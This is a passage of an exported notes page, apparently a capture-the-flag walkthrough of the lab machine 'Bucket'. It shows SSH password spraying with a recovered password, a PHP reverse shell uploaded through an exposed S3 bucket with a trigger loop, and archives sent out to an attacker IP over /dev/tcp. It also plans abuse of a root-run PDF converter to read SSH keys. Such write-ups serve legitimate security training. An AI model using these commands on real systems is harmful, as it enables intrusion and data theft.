SSH 10.10.10.212 22 10.10.10.212 [-] Sysadm:n2vM-<_K_Q:.Aa2 Authentication failed.</span></span></span></code></pre></li><li id="https://www.notion.so/9a7e6cbbcb5743de995465ea0d9b43bf" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">None of them work (including lowercase variants). The passwords seem legitimate, but the usernames may be placeholder names rather than real user accounts.</span></span></li></ul><div id="https://www.notion.so/41d8bb37534a4cf698012ac741cbc502" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">S3 Directory Traversal</strong></span></span></p></div><ul class="BulletedListWrapper"><li id="https://www.notion.so/44dfa5dac6c640858adb2b203355a94d" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">To make interacting with DynamoDB easier, we can install the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">aws-cli</code></span><span class="SemanticString"> utility:</span></span><div id="https://www.notion.so/89a3dcbee02a4ed88a5bae4c6f65f149" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ sudo pacman -S aws-cli</code></span></span></p></div></li><li id="https://www.notion.so/4e7b5191610f48dd8ea1b0ead4394c60" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Set up </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">aws-cli</code></span><span class="SemanticString"> and configure the access settings; the entries can be set to anything, as the S3 buckets are publicly exposed:</span></span><div 
id="https://www.notion.so/f1c1441a61cf45cf8d1a8626b8ed29aa" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ aws configure</code></span></span></p></div><div id="https://www.notion.so/ef2fd56ae068452b8a1a298e2e478d22" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">AWS Access Key ID [None]: samiko
AWS Secret Access Key [None]: okimas
Default region name [None]: us-ease-1
Default output format [None]: text</code></span></span></p></div></li><li id="https://www.notion.so/2e924d776db945dbb05414fed22c4610" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Enumerating files on the S3 server:</span></span><div id="https://www.notion.so/b34bc1e4379141388415a65eb8ca527f" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ aws s3 --endpoint-url http://s3.bucket.htb/ ls</code></span></span></p></div><pre id="https://www.notion.so/e7b6911340cf4c4d91dd8f3fd02b9fc4" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>2021-02-01 22:39:04 adserver</span></span></span></code></pre><div id="https://www.notion.so/5049a26e93a34ee8bb090ee532acd685" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ aws s3 --endpoint-url http://s3.bucket.htb/ ls s3://adserver/</code></span></span></p></div><pre id="https://www.notion.so/fd92a132df0a40ce90d46215d307079d" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span> PRE images/
2021-02-01 22:39:05 5344 index.html</span></span></span></code></pre><div id="https://www.notion.so/ded7f19c11874b2f932f55fc54bca87f" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ aws s3 --endpoint-url http://s3.bucket.htb/ ls s3://adserver/images/</code></span></span></p></div><pre id="https://www.notion.so/0d127ab6061f4b56b32979972c3b185b" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>2021-02-01 22:41:05 37840 bug.jpg
2021-02-01 22:41:05 51485 cloud.png
2021-02-01 22:41:05 16486 malware.png</span></span></span></code></pre></li><li id="https://www.notion.so/8251001862514372bf9168b7d5527b2d" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">These are the images we found earlier on the main host </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="http://bucket.htb/">http://bucket.htb</a></span><span class="SemanticString">; it looks like the server hosting the S3 virtual host is also hosting the main webserver.</span></span></li><li id="https://www.notion.so/f2fb1a01f4df40bcbe322e0774c3e4ed" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Let's try to upload a reverse shell with the cp command:</span></span><div id="https://www.notion.so/81195030bdff45e188581c73c6c99d13" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ aws s3 --endpoint-url http://s3.bucket.htb/ cp ./reverse.php s3://adserver</code></span></span></p></div></li><li id="https://www.notion.so/20491771dfb749e3a7e8a5e8e9da7c22" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">If we navigate to the reverse shell on the S3 subdomain directly, it won't be executed and the browser will instead try to download the PHP file. This is because the S3 bucket is only configured to host static content.</span></span></li><li id="https://www.notion.so/be20721cdaac468087cf6fe82bf47851" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">However, since the contents of the adserver bucket are also served by the primary domain, we can leverage the Apache webserver on </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="http://bucket.htb/">http://bucket.htb</a></span><span class="SemanticString"> to execute our reverse shell by navigating to </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="http://bucket.htb/reverse.php">http://bucket.htb/reverse.php</a></span><span class="SemanticString">.</span></span></li><li id="https://www.notion.so/49de3edcb85141a1bc059ec821ef386e" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">The S3 webserver seems to clean up files constantly, so there is only a small window between the moment the file is synchronised and the moment it gets deleted. We can maximise our chances by repeatedly requesting the file with a script.</span></span></li><li id="https://www.notion.so/9f800a78e3624570bf5559193cb48286" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Creating upload.sh:</span></span><pre id="https://www.notion.so/816d6d3a1c8149eaa4fef6afc4d7c8e3" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>#!/bin/sh
# Upload the file to the bucket, then keep requesting the synchronised copy
# on the main vhost so that a request lands before the clean-up job removes it.
aws --endpoint-url http://s3.bucket.htb/ s3 cp ./reverse.php s3://adserver/
echo "Upload successful, start a nc listener on port 6969 now:"
while true
do
    # "&>" is a bash-only redirection; under /bin/sh it backgrounds curl
    # instead of silencing it, so redirect stdout and stderr explicitly.
    curl http://bucket.htb/reverse.php > /dev/null 2>&1
    echo -n "."
done</span></span></span></code></pre></li><li id="https://www.notion.so/348a71752ae748568cdda80a21d387d2" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">After about 30-60 seconds, we should get a shell as www-data:</span></span><div id="https://www.notion.so/d110ebceb6ed475284a2b3ddc3bf3b22" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ whoami && id && hostname</code></span></span></p></div><pre id="https://www.notion.so/ae7b3db793fe445e828655b66de68fe7" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bucket</span></span></span></code></pre></li><li id="https://www.notion.so/65e0310bea65428bab26fd7810848d20" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Navigating to the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/home</code></span><span class="SemanticString"> directory, we see a user by the name "roy".</span></span></li><li id="https://www.notion.so/6d57cc4b79e84f0093b9c5fdd74039b4" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Checking passwords against roy on SSH:</span></span><div id="https://www.notion.so/4cdd286ec2e44517b589baaaa0922f7d" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ crackmapexec ssh 10.10.10.212 -u 'roy' -p passwords.txt</code></span></span></p></div><pre id="https://www.notion.so/a748fa01ef93443b8ecae4b731b97c68" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>SSH 10.10.10.212 22 10.10.10.212 [*] SSH-2.0-OpenSSH_8.2p1 Ubuntu-4
SSH 10.10.10.212 22 10.10.10.212 [-] roy:Management@#1@# Authentication failed.
SSH 10.10.10.212 22 10.10.10.212 [-] roy:Welcome123! Authentication failed.
SSH 10.10.10.212 22 10.10.10.212 [+] roy:n2vM-<_K_Q:.Aa2</span></span></span></code></pre></li><li id="https://www.notion.so/9c14ce5d4bc24a37b3088fafd8dca49a" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Looks like Roy is the sysadmin for the Bucket company, let's SSH in:</span></span><div id="https://www.notion.so/45be045b967541a58046bde552564d7d" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ ssh roy@10.10.10.212</code></span></span></p></div><div id="https://www.notion.so/e85b1ba922334688ae7741b1e46615be" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">n2vM-<_K_Q:.Aa2</code></span></span></p></div><div id="https://www.notion.so/33949042f42249acbc9310aa18039a44" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ whoami && id</code></span></span></p></div><pre id="https://www.notion.so/83f8bf59324c41f9be7eee147a4c2d22" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>roy
uid=1000(roy) gid=1000(roy) groups=1000(roy),1001(sysadm)</span></span></span></code></pre></li><li id="https://www.notion.so/9f661fd7797b42f2b54e61427b081075" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Get user flag!</span></span></li></ul><h2 id="https://www.notion.so/ac48149ed1e14ac1a410f1c892cecd43" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/ac48149ed1e14ac1a410f1c892cecd43"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Privilege Escalation</span></span></h2><ul class="BulletedListWrapper"><li id="https://www.notion.so/f890206560d44df8845abe667849f808" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Roy is in the group </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">1001(sysadm)</code></span><span class="SemanticString">, meaning he can read system logs, which may contain useful information or credentials.</span></span></li><li id="https://www.notion.so/b24fb5fc1dce4cb0a06d1a34506bf1e5" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Checking sudo permissions:</span></span><div id="https://www.notion.so/c0223d7653da4eabbf330c69c92ecf58" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ sudo -l</code></span></span></p></div><pre id="https://www.notion.so/bf25bc87b1104650b839a156b7f1442f" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>Sorry, user roy may not run sudo on bucket.</span></span></span></code></pre></li></ul><div id="https://www.notion.so/53ae5b26aeb74d5481c49946d240e560" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">AWS Project</strong></span></span></p></div><ul class="BulletedListWrapper"><li id="https://www.notion.so/42c7ab932ea442aca52f036cc8aea976" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found a </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">project</code></span><span class="SemanticString"> folder in roy's home directory:</span></span><div id="https://www.notion.so/c9f048ad5ca74631b751a187188f63e9" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ ls -la ~/project/</code></span></span></p></div><pre id="https://www.notion.so/218eb2ce5e6e4fe6ad77db2cf7eaa1ad" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>-rw-rw-r-- 1 roy roy 63 Sep 24 03:16 composer.json
-rw-rw-r-- 1 roy roy 20533 Sep 24 03:16 composer.lock
-rw-r--r-- 1 roy roy 367 Sep 24 03:15 db.php
drwxrwxr-x 10 roy roy 4096 Sep 24 03:16 vendor</span></span></span></code></pre></li><li id="https://www.notion.so/220cd37315dc4d858fa5b407af0dfd02" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">To copy the files back to our local machine for easier access, first archive the directory:</span></span><div id="https://www.notion.so/95895bca19e44c38af8e5ceb5dd3bf22" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ tar -czvf project.tar.gz ./project/</code></span></span></p></div></li><li id="https://www.notion.so/25f4de8eeac242cab03834eda6d847ec" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Now, on our local machine, start a </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">nc</code></span><span class="SemanticString"> listener to receive the archive:</span></span><div id="https://www.notion.so/02940579b8e948869fd16218478fab49" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nc -lvnp 6969 > project.tar.gz</code></span></span></p></div></li><li id="https://www.notion.so/36457f77f513453ba32124ca842a3fae" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">On the remote machine, send the archive to our listener, then extract it locally:</span></span><div id="https://www.notion.so/402c9d609e054185b384f47b8701a273" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ cat project.tar.gz > /dev/tcp/10.10.14.103/6969</code></span></span></p></div><div 
id="https://www.notion.so/63528ff7432f4d97b3cfc3fc8484255e" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ tar -xzvf ./project.tar.gz</code></span></span></p></div></li></ul><div id="https://www.notion.so/86c8f886f6074bf293bdb7e4757cd7a2" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">Port 8000</strong></span></span></p></div><ul class="BulletedListWrapper"><li id="https://www.notion.so/ae77a675f6da4646af53802324b7ac1d" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Checking for any listening ports:</span></span><div id="https://www.notion.so/746523fab6434152874de10d8d793aa6" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ netstat -tulnp</code></span></span></p></div><pre id="https://www.notion.so/76262e51f74c403f9547900dee4bc35d" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:37025 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:4566 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
udp 0 0 127.0.0.53:53 0.0.0.0:* -</span></span></span></code></pre></li><li id="https://www.notion.so/596fc9514c8b4ce9a335cdfa415f7e63" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Getting the port 8000 response, with the listener on our machine and curl on the target:</span></span><div class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nc -lvnp 6969 > 8000.html</code></span></span></p></div><div id="https://www.notion.so/eaaed9fccc5043bbb8b9371b41f6be6a" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ curl localhost:8000 > /dev/tcp/10.10.14.103/6969</code></span></span></p></div></li><li id="https://www.notion.so/f5151328877e4886a8ebe291a7ab0e1b" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">We can also find a separate </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/bucket-app</code></span><span class="SemanticString"> directory under </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/var/www/</code></span><span class="SemanticString">, with files very similar to those in the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">~/project/</code></span><span class="SemanticString"> directory:</span></span><div id="https://www.notion.so/87529dec9dbc41a697a771a9c94ac47e" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ ls -la /var/www/bucket-app/</code></span></span></p></div><pre id="https://www.notion.so/d181b455f72e4f23b5fdc431006fafb0" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>total 856
drwxr-x---+ 4 root root 4096 Sep 23 10:56 .
drwxr-xr-x 4 root root 4096 Sep 21 12:28 ..
-rw-r-x---+ 1 root root 63 Sep 23 02:23 composer.json
-rw-r-x---+ 1 root root 20533 Sep 23 02:23 composer.lock
drwxr-x---+ 2 root root 4096 Sep 23 03:29 files
-rwxr-x---+ 1 root root 17222 Sep 23 03:32 index.php
-rwxr-x---+ 1 root root 808729 Jun 10 2020 pd4ml_demo.jar
drwxr-x---+ 10 root root 4096 Sep 23 02:23 vendor</span></span></span></code></pre></li><li id="https://www.notion.so/49c855df057f49158ae25ec77fd02f5e" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Zip it up as </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">bucket-app.tar.gz</code></span><span class="SemanticString">, and send it back to our local machine with the same steps above.</span></span></li><li id="https://www.notion.so/9a2387c473484f5fb2e0ffa6c8ae2f6e" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Looking at </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">index.php</code></span><span class="SemanticString">, there is some interesting PHP code at the top of the file:</span></span><pre id="https://www.notion.so/af6371accf1d44e8aea6aad7cc336fad" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token php language-php"><span class="token delimiter important"><?php</span>
<span class="token keyword">require</span> <span class="token string single-quoted-string">'vendor/autoload.php'</span><span class="token punctuation">;</span>
<span class="token keyword">use</span> <span class="token package">Aws<span class="token punctuation">\</span>DynamoDb<span class="token punctuation">\</span>DynamoDbClient</span><span class="token punctuation">;</span>
<span class="token keyword">if</span><span class="token punctuation">(</span><span class="token variable">$_SERVER</span><span class="token punctuation">[</span><span class="token string double-quoted-string">"REQUEST_METHOD"</span><span class="token punctuation">]</span><span class="token operator">===</span><span class="token string double-quoted-string">"POST"</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
<span class="token keyword">if</span><span class="token punctuation">(</span><span class="token variable">$_POST</span><span class="token punctuation">[</span><span class="token string double-quoted-string">"action"</span><span class="token punctuation">]</span><span class="token operator">===</span><span class="token string double-quoted-string">"get_alerts"</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
<span class="token function">date_default_timezone_set</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'America/New_York'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$client</span> <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">DynamoDbClient</span><span class="token punctuation">(</span><span class="token punctuation">[</span>
<span class="token string single-quoted-string">'profile'</span> <span class="token operator">=></span> <span class="token string single-quoted-string">'default'</span><span class="token punctuation">,</span>
<span class="token string single-quoted-string">'region'</span> <span class="token operator">=></span> <span class="token string single-quoted-string">'us-east-1'</span><span class="token punctuation">,</span>
<span class="token string single-quoted-string">'version'</span> <span class="token operator">=></span> <span class="token string single-quoted-string">'latest'</span><span class="token punctuation">,</span>
<span class="token string single-quoted-string">'endpoint'</span> <span class="token operator">=></span> <span class="token string single-quoted-string">'http://localhost:4566'</span>
<span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$iterator</span> <span class="token operator">=</span> <span class="token variable">$client</span><span class="token operator">-></span><span class="token function">getIterator</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'Scan'</span><span class="token punctuation">,</span> <span class="token keyword">array</span><span class="token punctuation">(</span>
<span class="token string single-quoted-string">'TableName'</span> <span class="token operator">=></span> <span class="token string single-quoted-string">'alerts'</span><span class="token punctuation">,</span>
<span class="token string single-quoted-string">'FilterExpression'</span> <span class="token operator">=></span> <span class="token string double-quoted-string">"title = :title"</span><span class="token punctuation">,</span>
<span class="token string single-quoted-string">'ExpressionAttributeValues'</span> <span class="token operator">=></span> <span class="token keyword">array</span><span class="token punctuation">(</span><span class="token string double-quoted-string">":title"</span><span class="token operator">=></span><span class="token keyword">array</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"S"</span><span class="token operator">=></span><span class="token string double-quoted-string">"Ransomware"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">foreach</span> <span class="token punctuation">(</span><span class="token variable">$iterator</span> <span class="token keyword">as</span> <span class="token variable">$item</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
<span class="token variable">$name</span><span class="token operator">=</span><span class="token function">rand</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">,</span><span class="token number">10000</span><span class="token punctuation">)</span><span class="token operator">.</span><span class="token string single-quoted-string">'.html'</span><span class="token punctuation">;</span>
<span class="token function">file_put_contents</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'files/'</span><span class="token operator">.</span><span class="token variable">$name</span><span class="token punctuation">,</span><span class="token variable">$item</span><span class="token punctuation">[</span><span class="token string double-quoted-string">"data"</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
<span class="token function">passthru</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"java -Xmx512m -Djava.awt.headless=true -cp pd4ml_demo.jar Pd4Cmd file:///var/www/bucket-app/files/<span class="token interpolation"><span class="token variable">$name</span></span> 800 A4 -out files/result.pdf"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
<span class="token punctuation">}</span>
<span class="token keyword">else</span>
<span class="token punctuation">{</span>
<span class="token delimiter important">?></span></span></span></span></span></code></pre></li><li id="https://www.notion.so/c5af85f2a5794ef9b8a65e37ebe832ea" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">The function does the following when a POST request with the action </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">get_alerts</code></span><span class="SemanticString"> is received:</span></span><ol class="NumberedListWrapper"><li id="https://www.notion.so/c7ae6f36cda445dd8918ade916b2405e" class="NumberedList" value="1"><span class="SemanticStringArray"><span class="SemanticString">Creates a DynamoDB client pointing at the local endpoint on port 4566</span></span></li><li id="https://www.notion.so/94724b5ab646437ba4ad6f0ae735bba5" class="NumberedList" value="2"><span class="SemanticStringArray"><span class="SemanticString">Scans the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">alerts</code></span><span class="SemanticString"> table for items whose title is </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Ransomware</code></span></span></li><li id="https://www.notion.so/5fa3dde5f40f4a9cb4fc32743640808c" class="NumberedList" value="3"><span class="SemanticStringArray"><span class="SemanticString">Writes the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">data</code></span><span class="SemanticString"> attribute of each matching item into an HTML file with a randomised filename</span></span></li><li id="https://www.notion.so/2d16d03429674475b39dfd310f4fc859" class="NumberedList" value="4"><span class="SemanticStringArray"><span class="SemanticString">Renders the last HTML file written and converts it into a PDF file with </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Pd4Cmd</code></span></span></li><li id="https://www.notion.so/25982af56f9c429b9e2907946c3d1dc4" class="NumberedList" value="5"><span class="SemanticStringArray"><span class="SemanticString">Saves the resulting PDF in </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/var/www/bucket-app/files/</code></span></span></li></ol></li><li id="https://www.notion.so/b644068bbe084cd8a64bcc10765d6a78" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">If we search the process list for the DynamoDB instance, we see that it is owned by root, meaning all of the code above is executed with root privileges:</span></span><div id="https://www.notion.so/461813d80b8e443fa2fe209f3d35dc8e" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ ps aux | grep Dynamo</code></span></span></p></div><pre id="https://www.notion.so/e7298e5038404916a9a3c3f91f366034" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>root 1504 0.2 7.3 1677460 296264 ? 
Ssl 05:23 1:47 java -Djava.library.path=./DynamoDBLocal_lib -Xmx256m -jar DynamoDBLocal.jar -sharedDb -port 48727 -inMemory</span></span></span></code></pre></li><li id="https://www.notion.so/c1f144bb9e3f433f9c1e563a5935f347" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Using the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">aws-cli</code></span><span class="SemanticString"> utility to query the localhost instance, we see that there is no table called </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">alerts</code></span><span class="SemanticString"> to begin with:</span></span><div id="https://www.notion.so/3bd0cf2fe2044f0aab0a19773a1120c9" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ aws dynamodb list-tables --endpoint-url http://localhost:4566</code></span></span></p></div><pre id="https://www.notion.so/2406f274345b498195284f8c5d49f2b9" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>TABLENAMES users</span></span></span></code></pre></li><li id="https://www.notion.so/c9956b1903e848748bf9361c1a25bd20" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">This means the PHP code is searching for something that doesn't exist, so perhaps we can hijack it and force </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Pd4Cmd</code></span><span class="SemanticString"> to read sensitive data, such as root's SSH key. Whatever is stored in an item's </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">data</code></span><span class="SemanticString"> attribute is written verbatim into an HTML file that </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Pd4Cmd</code></span><span class="SemanticString"> then renders as root, so any markup in that field, including references to local files, is interpreted by the converter.</span></span></li><li id="https://www.notion.so/c2bce2c2fafe41979da7a455865ca936" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Following the </span><span 
